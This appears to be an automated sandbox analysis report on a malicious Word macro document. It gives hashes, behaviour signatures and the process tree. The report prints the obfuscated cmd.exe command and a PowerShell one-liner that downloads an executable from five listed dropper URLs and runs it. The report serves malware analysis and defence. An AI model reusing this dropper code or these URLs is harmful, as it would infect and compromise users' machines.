Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    25-05-2024 15:21

General

  • Target

    726665031b2e8bf327d418ef15cfc60b_JaffaCakes118.doc

  • Size

    76KB

  • MD5

    726665031b2e8bf327d418ef15cfc60b

  • SHA1

    35eb78421b3c8ee960e1c33b38ccd7a619183fb0

  • SHA256

    79eb8ce2f6e869a1583b04fe69318a6d7d125022d96b5ee2e02adb27c9b09bbd

  • SHA512

    a4125ed7f977ab55ff2149f7b76cb4ce1e9ebd48c9cfa4b7b924e40515d50ffab1630e09878892aaa28393b01239051a0338fdff040d87a4a58007f994535940

  • SSDEEP

    768:HpJcaUitGAlmrJpmxlzC+w99NB4+1ocMeZkxjsMdbfJfVQ+TNc:HptJlmrJpmxlRw99NB4+acMdhQ+p

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://kaijiang001.com/xxwBiLY

exe.dropper

http://ericsweredoski.com/C

exe.dropper

http://www.tri-solve.com/4ZO

exe.dropper

http://onlinelegalsoftware.com/RPtWwdec

exe.dropper

http://www.ultigamer.com/wp-admin/includes/d

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\726665031b2e8bf327d418ef15cfc60b_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3020
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V/C"^se^t ^8I=^ ^ ^ ^ ^ ^ ^ ^}^}^{^hctac}^;ka^er^b;U^qN$^ metI^-ekovnI^;)^UqN$ ,vl^P^$(el^i^F^da^olnwo^D.EVw${yrt^{)^f^j^z^$ n^i v^lP$(hc^aer^o^f^;'^exe.^'+Va^o^$+'^\^'^+c^i^l^b^u^p^:vne^$^=UqN^$^;'7^84^'^ =^ V^a^o^$;)^'^@^'(t^i^l^p^S.^'d/^s^ed^ulcn^i/ni^m^da^-^p^w/moc^.rem^a^git^l^u.^www//:pt^th^@c^e^d^w^WtPR/^m^oc^.er^a^wt^f^oslage^l^enilno//^:p^t^t^h@O^Z4/m^oc.ev^los^-^irt.^ww^w//^:^p^tth^@C/moc^.i^k^so^d^er^ewscire//^:ptth@Y^Li^B^wxx/^moc.100gnai^ji^ak//:^pt^t^h^'^=fj^z^$;tn^eilCbeW.^teN^ tcej^bo^-wen^=EVw^$^ l^le^hsrew^o^p&&^f^or /^L %^s ^in (^382,^-1^,0)d^o ^se^t ^q^7RX=!^q^7RX!!^8I:~%^s,1!&&i^f %^s l^s^s ^1 call %^q^7RX:^*q7RX^!^=%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $wVE=new-object Net.WebClient;$zjf='http://kaijiang001.com/xxwBiLY@http://ericsweredoski.com/C@http://www.tri-solve.com/4ZO@http://onlinelegalsoftware.com/RPtWwdec@http://www.ultigamer.com/wp-admin/includes/d'.Split('@');$oaV = '487';$NqU=$env:public+'\'+$oaV+'.exe';foreach($Plv in $zjf){try{$wVE.DownloadFile($Plv, $NqU);Invoke-Item $NqU;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2512

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      118296779ef3cf1d2f88414b44ef3910

      SHA1

      81e3c7de27ace5ba3430023a455b5909e51d9b80

      SHA256

      09244baa9e8bb6d7e8771337e436b3bce5a60295850becf35ead95a1a362f91c

      SHA512

      b9f32a7439c8aec1543a18fa2ed3846552145f7dbc47e25fd3d42008fea0737738f5b85dc86b26f34de4741092156b46f957b88e0f86c98703cddff98bf72275

    • memory/2988-11-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2988-2-0x000000007096D000-0x0000000070978000-memory.dmp

      Filesize

      44KB

    • memory/2988-7-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2988-8-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2988-10-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2988-0-0x000000002F121000-0x000000002F122000-memory.dmp

      Filesize

      4KB

    • memory/2988-6-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2988-9-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2988-22-0x000000007096D000-0x0000000070978000-memory.dmp

      Filesize

      44KB

    • memory/2988-23-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2988-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2988-40-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2988-41-0x000000007096D000-0x0000000070978000-memory.dmp

      Filesize

      44KB